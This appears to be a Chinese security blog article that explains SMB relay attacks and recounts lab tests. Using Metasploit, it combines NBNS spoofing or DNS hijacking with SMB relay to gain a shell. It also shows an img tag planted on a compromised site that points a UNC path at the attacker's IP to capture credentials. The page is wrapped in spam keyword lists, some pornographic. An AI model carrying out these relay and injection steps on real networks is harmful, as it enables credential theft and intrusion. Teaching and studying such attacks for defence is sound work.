成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

再談SMB中繼攻擊

安全 黑客攻防
本文中,筆者介紹了SMB中繼攻擊的運作原理,并分享了實際測試的攻擊方式。

PS:下面的都是自己實際測試過的,并非理論文章,如果有什么地方不對的請斧正,謝謝 >_<

首先,介紹一下SMB中繼攻擊的運作原理

再談SMB中繼攻擊

假設左邊的主機為A,右邊的主機為B

A試圖訪問B的共享服務

第一步     A對B說:騷年,請讓我登陸
第二步     B對A說:騷年,我給你一個challenge,請先把你的密碼Hash和challenge加密一下返回給我,我得確認你是否有權限
第三步     A對B說:我加密好了,給你
情景一:
第四步     B對A說:嗯,對的,請進(認證結束)
情景二:
第四步     B對A說:騷年,不對,你的身份不能登陸,你可以試試以別人的身份來登陸
第五步     A對B說:好嘛,我用你之前告訴我的身份試試,回到第一步,循環下去

現在,如果加入了一名第三者C到兩者之間,C企圖查看B的隱私,C會怎么做?

再談SMB中繼攻擊

上圖就是C的做法

第一步 A對C說:騷年,請讓我登陸
第二步 C對B說:騷年,請讓我登陸
第三步 B對C說:騷年,我給你一個challenge,請先把你的密碼Hash和challenge加密一下返回給我,我得確認你是否有權限
第四步 C對A說:騷年,我給你一個challenge(這是B發出的challenge),請先把你的密碼Hash和challenge加密一下返回給我,我得確認你是否有權限
第五步 A對C說:我加密好了,給你
第六步 C對B說:我加密好了,給你
情景一:
第七步 B對C說:嗯,對的,請進(認證結束,C替代A獲取了權限)
第八步 C對A說:騷年,不對,你的身份不能登陸(A的認證結束)
情景二:
第七步 B對C說:騷年,不對,你的身份不能登陸,你可以試試以別人的身份來登陸
第八步 C對B說:好嘛,我用你之前告訴我的身份試試
第九步 C對A說:騷年,不對,你的身份不能登陸,你可以試試以別人的身份來登陸
第十步 A對C說:好嘛,我用你之前告訴我的身份試試,回到第一步,循環下去

OK,你可以看出,A和B都被C欺騙了,這明顯是一場中間人攻擊

這里面還有一處不合理的地方,不知道你發現沒有,A想和B對話,怎么會和C吹起牛來了呢?

肯定是A誤以為C就是B,C是怎么做到的呢?

下面就來探究一下C的騙人手法,如果你是C你會怎么做呢?

1. NBNS欺騙,前提
a)     A B C必須都處在同一個局域網下面
b)     A尋找B是用的B的計算機名而不是B的ip
2. DNS劫持,前提
a)     A尋找B是用的B的域名而不是B的ip

下面就讓我們來重演一下這次攻擊!

方式1:NBNS欺騙 + SMB中繼

出品人:

A     winxp      192.168.30.129
B     win2k3    192.168.30.130       計算機名:smbserver
C     kali         192.168.30.145

Kali msf下使用smb_replay模塊,設置SMBHOST為B(192.168.30.130)

再談SMB中繼攻擊

Kali msf下使用nbns_response模塊將B的計算機名(smbserver)解析到C的IP(192.168.30.145)

再談SMB中繼攻擊

Winxp 訪問smbserver的共享

再談SMB中繼攻擊

OK,到Kali下看看結果

再談SMB中繼攻擊

Cool,我們成功拿到了B的Meterpreter shell

原理:NBNS是廣播的,所以C只需要趕在B之前告訴A:“C的計算機名是smbserver”就行了

方式2:DNS劫持+SMB中繼

出品人:

A     winxp      192.168.30.129

B     win2k3    192.168.30.130       域名:share.baidu.com

C     kali         192.168.30.145

由于虛擬機有限,我將B模擬成一臺內網中被黑掉的DNS服務器

Kali msf下使用smb_replay模塊,設置SMBHOST為B(192.168.30.130)

再談SMB中繼攻擊

將DNS服務器的 share.baidu.com 域名指向C(192.168.30.145)

再談SMB中繼攻擊

Winxp 訪問share.baidu.com的共享

再談SMB中繼攻擊

OK,到Kali下看看結果

再談SMB中繼攻擊

成功拿到B的shell

如果你很注意細節,你應該會有一個問題,如果我們將NBNS欺騙和DNS劫持同時啟用,但指向不同的IP會有怎樣的效果?

我將告訴你:只有DNS劫持會起作用

看下圖就知道了

再談SMB中繼攻擊

A先訪問一個不存在的名字,同時抓取數據包

你可以看出A(192.168.30.129)發出的第一個數據包是DNS查詢

上面的兩種攻擊都是在A先試圖想和B說話造成的,假如他們本來就不怎么聯系那我們豈不是要等很久?

這太被動了,我必須改變這種局面!!怎么改呢,下面就是我想說的了 >_<

再談SMB中繼攻擊

UNC攻擊+SMB中繼

出品人:

A     winxp      192.168.30.129
B     win2k3    192.168.30.130
C     kali         192.168.30.145

由于虛擬機有限,我將B模擬成一臺被黑掉的WEB服務器(域名www.caoliu.oh)

管理員每天都喜歡在個人機上訪問草榴網,看看有什么新的資源

我知道他會這樣,所以我先拿下了草榴的WEB權限,然后在首頁插入了這樣的一個鏈接

<imgsrc=”192.168.30.145rio.jpg”/>

很不幸,這張圖他不會看到,如果他的個人機的賬戶及密碼是和服務器是一樣的,呵呵,他的服務器就這么淪陷了。但是有一個前提 A B C的共享都是互相可訪問的,如果個人機在防火墻外,那這就不可行了。

原理就是這樣,不插圖了,自己腦補一下就行了 >_<

SMB中繼升級版

上面都是A訪問B導致B被黑掉,而且UNC攻擊還需要在賬戶及密碼一樣的情況下才能成功,這太二了,既然可以SMB中繼,為何我們不把A的流量中繼到A本身,那樣賬戶和密碼一定是對的。如果A開啟了共享,且可被C訪問,那么一定會攻擊成功。好了,就到這里,具體的自己實驗吧!

相關文章:

http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python

責任編輯:藍雨淚 來源: 網絡攻防實驗室
相關推薦

2021-07-26 13:34:37

中繼攻擊微軟黑客

2013-04-18 17:07:36

2019-07-29 12:48:08

2010-06-18 23:01:16

IT管理安防產業H3C

2010-06-21 21:35:28

運維管理安防行業H3C

2015-08-11 16:16:48

中繼網橋信銳

2010-09-01 16:55:07

DHCP中繼

2010-09-26 12:04:30

DHCP中繼

2012-02-27 09:30:22

JavaScript

2009-11-04 11:51:08

技術領袖

2021-07-31 23:09:42

GPU內存帶寬

2013-07-21 04:11:12

PythonRubyPHP

2010-09-01 16:42:34

DHCP中繼

2010-09-29 15:15:15

DHCP中繼

2010-09-01 17:11:01

DHCP中繼代理

2011-07-07 10:40:18

Enyokindscomponents

2011-03-17 10:37:07

JavaScript

2012-05-17 10:02:02

2018-10-23 14:24:10

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲综合小视频 | 国产在线观 | 97起碰| 国产精品久久毛片av大全日韩 | 日韩羞羞 | 一区二区三区四区国产 | 一区视频在线 | 欧美国产日韩在线观看成人 | www.天天操.com| 久久久天堂| 天堂中文在线播放 | 欧美一级www片免费观看 | 日韩成人影院在线观看 | 国产精品视频偷伦精品视频 | 色橹橹欧美在线观看视频高清 | 亚洲国产成人精品一区二区 | 欧美一区二区三区在线观看视频 | 国产成人一区二区三区 | 久久国产免费 | 国产欧美日韩精品在线观看 | 欧美日韩成人 | 午夜一区二区三区在线观看 | 一级毛片网 | avmans最新导航地址 | 人人操日日干 | 久久69精品久久久久久久电影好 | 日韩av一区二区在线观看 | 日本福利视频免费观看 | 蜜桃精品视频在线 | 久久99蜜桃综合影院免费观看 | 一区二区av | 国产在线小视频 | 一区二区三区免费在线观看 | 午夜99 | 一区二区三区国产好的精 | 国产精品久久久久久婷婷天堂 | 亚洲国产精品视频一区 | 欧美日韩精品久久久免费观看 | 久久久国产精品一区 | 色婷婷国产精品 | 成人免费看电影 |